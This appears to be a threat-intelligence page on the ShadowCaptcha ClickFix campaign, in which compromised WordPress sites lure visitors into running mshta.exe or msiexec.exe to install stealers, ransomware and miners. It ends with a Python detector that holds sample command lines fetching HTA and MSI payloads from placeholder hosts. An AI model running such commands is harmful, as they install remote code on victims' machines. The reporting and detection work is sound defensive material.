ShadowCaptcha WordPress ClickFix campaign
Campaign
Summary
The ShadowCaptcha campaign is abusing over 100 compromised WordPress sites to funnel visitors into fake CAPTCHA pages that deliver info stealers, ransomware, and cryptocurrency miners, widening malware risk across multiple sectors. First detected in August 2025, the operation uses ClickFix lures and malicious JavaScript to push victims toward Windows Run prompts or HTA execution through mshta.exe and msiexec.exe. The chain can end in Lumma and Rhadamanthys theft payloads, Epsilon Red ransomware, or XMRig mining.
Related Happenings
Storm-1175 high-tempo Medusa ransomware campaign
Campaign
First: 07.04.2026 13:02
Last: 07.04.2026 13:02
Sources 1
About this happening:
**Storm-1175** is running a **high-tempo Medusa ransomware campaign** that has repeatedly exploited **n-day and zero-day flaws** to gain initial access before patching closes the...
BadIIS malware deployment on compromised IIS servers in Thailand and Vietnam
Malware Activity
First: 30.01.2026 14:08
Last: 30.01.2026 14:08
Sources 1
About this happening:
**BadIIS** is a **malicious native IIS module** used on **compromised IIS servers** to support **SEO fraud** and traffic manipulation. **Cisco Talos** says the activity is tied to...
JackFix ClickFix fake-adult-site phishing campaign
Campaign
First: 25.11.2025 16:18
Last: 25.11.2025 16:18
Sources 1
About this happening:
The **JackFix** campaign is using **fake adult websites** and **ClickFix** lures to trick users into running malicious commands, enabling an infection chain that can drop **steale...
ClickFix variants delivering LummaC2 and Rhadamanthys
Malware Activity
First: 24.11.2025 22:42
Last: 24.11.2025 22:42
Sources 1
About this happening:
Since **October 1**, **ClickFix** variants have been using a **fake Windows Update** screen and **human verification** lures to trick Windows users into pasting commands that exec...
GootLoader malware activity with WOFF2 font filename obfuscation
Malware Activity
First: 11.11.2025 17:44
Last: 11.11.2025 17:44
Sources 1
About this happening:
The **GootLoader** loader has resurfaced with a new **WOFF2 font-based** filename obfuscation trick that hides payload names and helps it evade analysis. Huntress observed **three...
Timeline
- 26.08.2025 13:45 · 1 article
ShadowCaptcha WordPress ClickFix campaign disclosed
Initial Disclosure: ShadowCaptcha was disclosed as a large-scale campaign first detected in August 2025 and observed abusing over 100 compromised WordPress sites to redirect visitors to fake Cloudflare or Google CAPTCHA pages. The ClickFix chain uses malicious JavaScript, the Windows Run dialog, saved HTA files run through mshta.exe, and MSI installers launched with msiexec.exe to deliver Lumma and Rhadamanthys stealers, Epsilon Red ransomware, or XMRig miners; mining variants also used clipboard poisoning, anti-debugging, DLL side-loading, and a vulnerable WinRing0x64.sys driver. Infected WordPress sites were reported across Australia, Brazil, Colombia, Canada, Italy, and Israel, and mitigations included user training against ClickFix prompts, WordPress patching, network segmentation, and MFA.
Sources:
- ShadowCaptcha Exploits WordPress Sites to Spread Ransomware, Info Stealers, and Crypto Miners — thehackernews.com — 26.08.2025 13:45
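The execution step described above (a Run-dialog launch of mshta.exe or msiexec.exe pointing at a remote URL or a freshly saved .hta) is something endpoint telemetry can surface directly. The following is an added detection example, not code from the original page or from any vendor report; the event format and the sample events are constructed for illustration, and the hostnames and paths in them are placeholders, not real ShadowCaptcha indicators.

```python
import re

# Added example, not from the original page: flags the ClickFix execution pattern
# described above, mshta.exe or msiexec.exe launched from the Run dialog (parent
# explorer.exe) with a remote URL or an .hta staged in a user-writable directory.

# Constructed sample events (hypothetical telemetry, not real ShadowCaptcha IoCs).
# Simplified Sysmon-style record: timestamp|ParentImage|Image|CommandLine
SAMPLE_EVENTS = """\
2025-08-26T13:40:01|C:\\Windows\\explorer.exe|C:\\Windows\\System32\\mshta.exe|mshta.exe https://captcha.example.invalid/verify.hta
2025-08-26T13:41:10|C:\\Windows\\explorer.exe|C:\\Windows\\System32\\msiexec.exe|msiexec.exe /i https://cdn.example.invalid/update.msi /qn
2025-08-26T13:42:05|C:\\Windows\\explorer.exe|C:\\Windows\\System32\\mshta.exe|mshta.exe C:\\Users\\u\\AppData\\Local\\Temp\\captcha.hta
2025-08-26T13:43:00|C:\\Windows\\System32\\services.exe|C:\\Windows\\System32\\msiexec.exe|msiexec.exe /V
2025-08-26T13:44:22|C:\\Windows\\explorer.exe|C:\\Windows\\System32\\notepad.exe|notepad.exe notes.txt
"""

LOLBINS = {"mshta.exe", "msiexec.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)
# .hta under a profile/temp directory rather than a system path
USER_HTA_RE = re.compile(r"\\(?:Users|AppData|Temp|Downloads)\\[^ ]*\.hta\b", re.IGNORECASE)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def classify(parent: str, image: str, cmdline: str):
    """Return a reason string if the process event matches the pattern, else None."""
    child = basename(image)
    # Run-dialog launches appear as children of explorer.exe; service-driven
    # msiexec (parent services.exe) and ordinary applications are left alone.
    if child not in LOLBINS or basename(parent) != "explorer.exe":
        return None
    if URL_RE.search(cmdline):
        return f"{child} fetching remote payload from Run dialog"
    if USER_HTA_RE.search(cmdline):
        return f"{child} executing .hta from user-writable path"
    return None


def scan(text: str) -> list:
    """Scan newline-separated events; return [(timestamp, reason), ...] for hits."""
    hits = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, parent, image, cmdline = line.split("|", 3)
        reason = classify(parent, image, cmdline)
        if reason:
            hits.append((ts, reason))
    return hits
```

Running `scan(SAMPLE_EVENTS)` flags the first three events and leaves the service-spawned msiexec and the notepad launch alone; in a real deployment the parent check should also cover other ways a pasted command can be launched, such as a terminal opened from the Run dialog.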